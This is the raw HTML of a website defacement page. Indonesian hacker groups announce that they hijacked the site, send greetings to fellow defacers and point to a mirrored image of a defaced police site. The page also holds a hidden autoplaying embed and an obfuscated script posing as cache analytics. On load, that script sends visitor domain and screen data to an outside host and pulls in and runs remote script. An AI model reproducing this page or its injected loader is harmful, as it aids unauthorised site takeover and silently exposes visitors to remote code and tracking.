

<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="icon" 
type="image/png" href="http://www.zone-h.com/images/cflags/png/id.png" />
  <title>Hacked h3h3</title>
</head><br><br><br>
<body style="background-color: rgb(0, 0, 0); color: rgb(0, 0, 0);"
 alink="#ee0000" link="#0000ee" vlink="#551a8b">
<div style="text-align: center;">w<br>
<span style="color: rgb(127, 127, 126);"><br>
<span style="font-family: monospace;">
 <img border="0" src="http://zonehmirrors.org/defaced/2015/05/19/team-sec7or.my.id/sepolwan.polri.go.id/LOL.jpeg" width="195" height="314"><br><br>
 <span
 style="color: rgb(253, 253, 251);">Black Illusion Security and Indonesian Freedom Security<br><br>	
g0t h1j4cK<br>
</span></span></span><span
 style="color: rgb(127, 127, 126);"><span
 style="font-family: monospace;"></span></span><span
 style="color: rgb(255, 255, 255);">
 
<br
 style="font-family: monospace; color: rgb(127, 127, 126);">
<span style="font-family: monospace; color: rgb(127, 127, 126);"><span
 style="color: rgb(253, 253, 251);">XenUx_404 and LolzSec<br>
<br>
<a target=blank href="https://m.facebook.com/marbot.masjid.go.id">@RiyanGans</a><br>
<span style="font-family: monospace; color: rgb(127, 127, 126);"><span
 style="color: rgb(253, 253, 251);"> gr33ts :</span><br>
 <span style="font-family: monospace; color: rgb(127, 127, 126);"><span
 style="color: rgb(253, 253, 251);"> Gend3ruw0 - LoliCyndrome - ./er0sensei1337 - Mr.FMR - RESIS-07 - ACE666X - Indonesian People </span><br><br>
<embed src="http://www.youtube.com/v/7YX1d2hd3is&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mDeSGS2mK%2feCgfhUDxtyzOsBP%2bQTegiRBVHnYxMHgX9HIXyUEd5Rowz5Sy37IPqDfGRMOWpeQGoocBDt%2bd88h5CENrnNe5qAjKpEybtwu8lPooa23QTGrKw6tKgRBv1o7BA4GNBmnOwCVm1L7rDTmYQBNuxCVThX%2b25vIvJJp075j3lO7FSaGBmHMWhOrJRiHHcTIOXF52epp8QhbiJVrto21jWhpAVUvtQ4EHATOC7WoicqT5fYyF6ecLIiX5DC87VjUJ%2bg4NdHJYADvXWF%2f%2bAKq%2fTb0Xl1zkEBywM4ZZDEmJUXd9sMBa3pjxD2Ods7qqFoDoEJ8Fo7Co7Su0UjQLOJSNTCenqyxygxTa55lH2DhqIF%2bgTwYAbzVJsjG%2f%2bPRWx7EGQinueRY3vg1Eyw31SugsPhb7teaKPsjUX8JpvT6jStj7w1%2bbfpUQNilqv4k77LBnhqNbti48zTvN5JSz%2bp7kqvdjPCr%2be87J9wWnj53Y0ZHGjDuwfRLZbHuw8mojjWRccNxMp94a2D1vymMEFh1HYEvEPmTBKKf860shpD8Oij%2bSYj6AvXJOfDhTQSnTaerZ2trMgMlJaltqXEl1uhGrFLNiU4T6dDQC0YyO28%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
<!-- end: index -->